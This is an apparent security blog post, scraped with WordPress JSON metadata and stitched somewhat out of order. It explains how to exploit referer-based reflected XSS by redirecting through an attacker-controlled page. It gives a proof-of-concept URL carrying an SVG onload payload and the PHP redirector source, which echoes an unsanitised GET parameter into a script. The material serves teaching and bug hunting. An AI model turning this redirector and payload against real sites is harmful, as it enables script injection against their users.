Like any other reflection based XSS where Referer value gets reflected into response body without any sanitization, this happens when a web application makes use of referer value for any feature\/tracking, etc. <\/p>\n\n\n\n
Note:- By default browsers encode referer URLs, so this only applies where application make use of URLdecoded referer URL. <\/strong><\/p>\n\n\n\n Here is how vulnerable page looks like:- <\/p>\n\n\n\n http:\/\/p0c.geekboy.ninja\/rxss-demo.php<\/a><\/p>\n\n\n\n How to exploit? <\/strong><\/p>\n\n\n\n To control the referer header, one can make a redirection from the controlled page and append the XSS payloads in the URI, here is the hosted version of POC in action.<\/p>\n\n\n\n http:\/\/p0c.geekboy.ninja\/rxss.php\/<svg\/onload=alert(document.domain)>?target=http:\/\/p0c.geekboy.ninja\/rxss-demo.php<\/a><\/p>\n\n\n\n Source code:- <\/p>\n\n\n\n <\/p>\n\n\n\n Feel free to host it for your self or use the hosted version, now go back and check if you missed any XSS in a similar scenario. <\/p>\n\n\n\n Resources:- Happy Hacking! <\/p>\n","protected":false},"excerpt":{"rendered":" Hello Everyone, I\u2019m writing this after a long break. This post is about how one can exploit referer based XSS using JavaScript based redirection, this is not something new but not found enough resources when I was looking to exploit something similar in the past so thought to summarise quickly and share it with everyone. […]<\/p>\n","protected":false},"author":1,"featured_media":690,"comment_status":"open","ping_status":"open","sticky":true,"template":"","format":"standard","meta":[],"categories":[1],"tags":[26,25],"_links":{"self":[{"href":"https:\/\/www.geekboy.ninja\/blog\/wp-json\/wp\/v2\/posts\/663"}],"collection":[{"href":"https:\/\/www.geekboy.ninja\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.geekboy.ninja\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.geekboy.ninja\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.geekboy.ninja\/blog\/wp-json\/wp\/v2\/comments?post=663"}],"version-history":[{"count":24,"href":"https:\/\/www.geekboy.ninja\/blog\/wp-json\/wp\/v2\/posts\/663\/revisions"}],"predecessor-version":[{"id":688,"href":"https:\/\/www.geekboy.ninja\/blog\/wp-json\/wp\/v2\/posts\/663\/revisions\/688"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.geekboy.ninja\/blog\/wp-json\/wp\/v2\/media\/690"}],"wp:attachment":[{"href":"https:\/\/www.geekboy.ninja\/blog\/wp-json\/wp\/v2\/media?parent=663"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.geekboy.ninja\/blog\/wp-json\/wp\/v2\/categories?post=663"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.geekboy.ninja\/blog\/wp-json\/wp\/v2\/tags?post=663"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}![\"\"](\"https:\/\/www.geekboy.ninja\/blog\/wp-content\/uploads\/2019\/09\/Screen-Shot-2019-09-25-at-3.19.26-AM-1024x388.png\")
<\/figure>\n\n\n\n<?php header('X-XSS-Protection: 0'); ?>\n<!DOCTYPE html>\n<html>\n<head>\n<title>Referer based XSS testing<\/title>\n<\/head>\n<body>\n<script>window.location.replace('<?php echo $_GET['target']; ?>');<\/script>\n<\/body>\n<\/html>\n<\/pre>\n\n\n\n\n
<\/strong>
https:\/\/www.gremwell.com\/exploiting_xss_in_referer_header<\/a>
https:\/\/medium.com\/@arbazhussain\/referer-based-xss-52aeff7b09e7<\/a>
<\/p>\n\n\n\n